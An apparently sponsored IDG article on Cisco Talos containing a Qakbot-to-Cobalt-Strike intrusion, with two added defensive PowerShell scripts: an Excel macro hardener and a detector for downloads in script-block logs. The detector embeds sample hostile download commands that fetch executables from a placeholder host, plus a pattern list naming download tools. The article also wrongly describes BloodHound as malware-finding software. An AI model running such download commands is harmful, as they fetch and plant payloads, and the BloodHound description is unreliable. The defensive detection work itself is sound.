Defend Against Ransomware With Relationship-Driven Incident Response

A large company recently had a close call with a ransomware attack. The saga started with a malware download.


Cyberattacks are so sophisticated these days that even with the best education and training, employees inadvertently click links or download documents that look all too real.

Furthermore, systems are often configured to allow downloads or macros that contain malicious files because employees use these applications and documents to do their everyday work, from wherever they may be working.

This was the case for a publicly traded company with more than $8 billion in annual revenues, which was in the midst of a merger and acquisition. Fortunately, thanks to a close partnership with Cisco Talos Incident Response (CTIR), the attack was discovered and averted before any damage could be done.

The saga started when an employee inadvertently downloaded a malicious document containing the Qakbot (QBOT) trojan. This malware targets banking credentials and financial information.

Unfortunately, the host system was configured to trust and enable all macros in Excel documents coming from the Internet. So, there was no warning or notification when the user downloaded the Zip file. Once opened, a macro within the malicious Excel document downloaded a payload file from the Internet, which was then stored on the user’s machine.
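The trust setting described above is a registry value that can be audited and corrected. The following PowerShell script is an added example, not code from the article or from Cisco Talos: it reads the current Excel macro posture, flags the "enable all macros" configuration that let this document run silently, and applies a hardened setting (signed macros only, and macros blocked in files downloaded from the Internet). It assumes Office 2016 or later (registry version key `16.0`), the per-user `HKCU` location, and that it is run in the affected user's session.

```powershell
# Added example (not from the article or Cisco Talos): audit and harden the Excel
# macro trust settings that allowed the malicious workbook to run without a prompt.
# Assumption: Office 2016/2019/365 (registry version "16.0"), per-user settings.

$OfficeVersion = '16.0'   # assumption: adjust for other Office builds
$SecurityKey   = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Excel\Security"
$PolicyKey     = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\Excel\Security"

# Meaning of the VBAWarnings value as Office stores it
$VbaWarningLevels = @{
    1 = 'Enable all macros (weak: no prompt, the setting in this incident)'
    2 = 'Disable all macros with notification (Office default)'
    3 = 'Disable all except digitally signed macros'
    4 = 'Disable all macros without notification'
}

function Get-ExcelMacroPosture {
    # Missing values return $null, which means the Office default applies
    $vba  = (Get-ItemProperty -Path $SecurityKey -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
    $motw = (Get-ItemProperty -Path $PolicyKey -Name blockcontentexecutionfrominternet -ErrorAction SilentlyContinue).blockcontentexecutionfrominternet

    $meaning = if ($null -ne $vba -and $VbaWarningLevels.ContainsKey([int]$vba)) {
        $VbaWarningLevels[[int]$vba]
    } else {
        'Not set (Office default applies: disable with notification)'
    }

    [pscustomobject]@{
        VBAWarnings         = $vba
        VBAWarningsMeaning  = $meaning
        BlockInternetMacros = $motw
        # Weak if macros run unprompted, or if Mark-of-the-Web files are not blocked
        Weak                = ($vba -eq 1) -or ($motw -ne 1)
    }
}

function Set-ExcelMacroHardening {
    # Require digitally signed macros and block macro execution in files
    # that carry the Mark of the Web (downloaded from the Internet)
    New-Item -Path $SecurityKey -Force | Out-Null
    New-Item -Path $PolicyKey   -Force | Out-Null
    Set-ItemProperty -Path $SecurityKey -Name VBAWarnings -Value 3 -Type DWord
    Set-ItemProperty -Path $PolicyKey   -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
}

# Usage: report the current posture, harden if it is weak, then report again
$before = Get-ExcelMacroPosture
$before | Format-List
if ($before.Weak) {
    Set-ExcelMacroHardening
    Get-ExcelMacroPosture | Format-List
}
```

In a managed environment the same two values are normally pushed by Group Policy rather than set per machine; the script is useful for confirming that the policy actually landed on a host, which is the check a responder would want after an incident like this one.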

Next, the adversary used PowerShell, a Microsoft task automation and configuration program, to download a penetration-testing tool — Cobalt Strike — onto the victim’s machine. Cobalt Strike is typically used by security red teams to emulate threats and demonstrate the risks around data breaches. The attacker used it to further take control of the machine and launch an open-source program called BloodHound, which cybersecurity teams use to find viruses and malware.

In this case, the ransomware attacker used BloodHound to gain access to and understand the company’s Active Directory structure, including those identities that have administrative access to files. The objective in these scenarios is to uncover attack paths that will give the attacker full control of targeted data.

At this point, a JSON file was created in the user’s downloads folder. An analysis of the attack assumes that this JSON file was used to direct data — including valuable identity and access information — into a .CSV file.

Crisis averted

All of these steps took place within less than 10 hours of the malicious file being opened by the user. The events were observed by CTIR using telemetry within Cisco SecureX, a cloud-native platform that integrates threat intelligence in real time.

When the attacker used PowerShell to direct further downloads, CTIR sent a notification to the customer, who was then able to rapidly contain the attack and avoid damage.
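The notification step described here depends on spotting PowerShell that reaches out to the network. The following script is an added example, not code from the article, from Cisco SecureX or from CTIR: it scans PowerShell script-block log entries (Event ID 4104 in the `Microsoft-Windows-PowerShell/Operational` log) for download cmdlets and .NET download calls and emits one alert record per hit. The sample entries, the host and user names, and the `example.invalid` URLs are constructed so the script runs without a live event log; the pattern list is a starting point to be tuned per environment.

```powershell
# Added example (not from the article or Cisco's tooling): flag PowerShell script-block
# log entries that download content from the network.

# Constructed sample entries in the shape of 4104 events (host, user and URLs are made up)
$SampleScriptBlocks = @(
    [pscustomobject]@{ TimeCreated = '2021-03-01T09:14:02'; Host = 'WS-FIN-042'; User = 'CORP\jdoe'
        ScriptBlockText = 'Get-ChildItem C:\Reports | Sort-Object LastWriteTime' }
    [pscustomobject]@{ TimeCreated = '2021-03-01T09:31:55'; Host = 'WS-FIN-042'; User = 'CORP\jdoe'
        ScriptBlockText = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/update.dat','C:\Users\jdoe\AppData\Local\Temp\update.dat')" }
    [pscustomobject]@{ TimeCreated = '2021-03-01T09:32:10'; Host = 'WS-FIN-042'; User = 'CORP\jdoe'
        ScriptBlockText = "Invoke-WebRequest -Uri 'http://example.invalid/a' -OutFile C:\Users\Public\a.exe" }
)

# Regexes for in-script network downloads; -match is case-insensitive by default
$DownloadPatterns = @(
    'Net\.WebClient',
    'Download(File|String|Data)\(',
    'Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b',
    'Invoke-RestMethod|\birm\b',
    'Start-BitsTransfer',
    'System\.Net\.Http\.HttpClient'
)

function Find-PowerShellDownloads {
    # Returns one alert object per event whose script text matches any download pattern
    param([object[]]$Events)
    foreach ($e in $Events) {
        $hits = $DownloadPatterns | Where-Object { $e.ScriptBlockText -match $_ }
        if ($hits) {
            [pscustomobject]@{
                TimeCreated     = $e.TimeCreated
                Host            = $e.Host
                User            = $e.User
                MatchedPatterns = ($hits -join '; ')
                ScriptBlockText = $e.ScriptBlockText
            }
        }
    }
}

function Get-ScriptBlockEvents {
    # Live variant: map 4104 events to the same shape as the samples. In a 4104 event the
    # properties are MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path,
    # so the script text is the third property. Requires script block logging enabled.
    Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' `
                 -FilterXPath '*[System[EventID=4104]]' -ErrorAction Stop |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated     = $_.TimeCreated
                Host            = $_.MachineName
                User            = $_.UserId
                ScriptBlockText = $_.Properties[2].Value
            }
        }
}

# Usage on the constructed samples: the first entry is benign, the other two are flagged
Find-PowerShellDownloads -Events $SampleScriptBlocks | Format-Table -AutoSize

# Usage on a live host (uncomment where script block logging is turned on):
# Find-PowerShellDownloads -Events (Get-ScriptBlockEvents) | Format-Table -AutoSize
```

Script block logging records the de-obfuscated text of what actually ran, which is why it is the right source for this check; the alert record carries the host and user so the responder knows which machine to contain, which is the decision the customer had to make quickly in this story.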

“The Talos team has invested significant time and effort in us to fully understand our people and environment before an incident occurred,” said the company’s CISO. “When we were faced with a significant security incident, that trust and familiarity were the key differentiators that enabled us to successfully contain the threat and minimize damages.”

It’s critical that these relationships between third-party incident response teams and internal staff are tried and tested for preparedness, according to Brad Garnett, general manager of Incident Response at Cisco Talos Intelligence Group.

“It’s important that there is an elevated level of trust between IR team and client, and that there is an established and agreed-upon process when time is of the essence to prevent an enterprise-wide ransomware attack when an active adversary is identified,” he said.

Learn more about Cisco Talos Incident Response. 


Copyright © 2021 IDG Communications, Inc.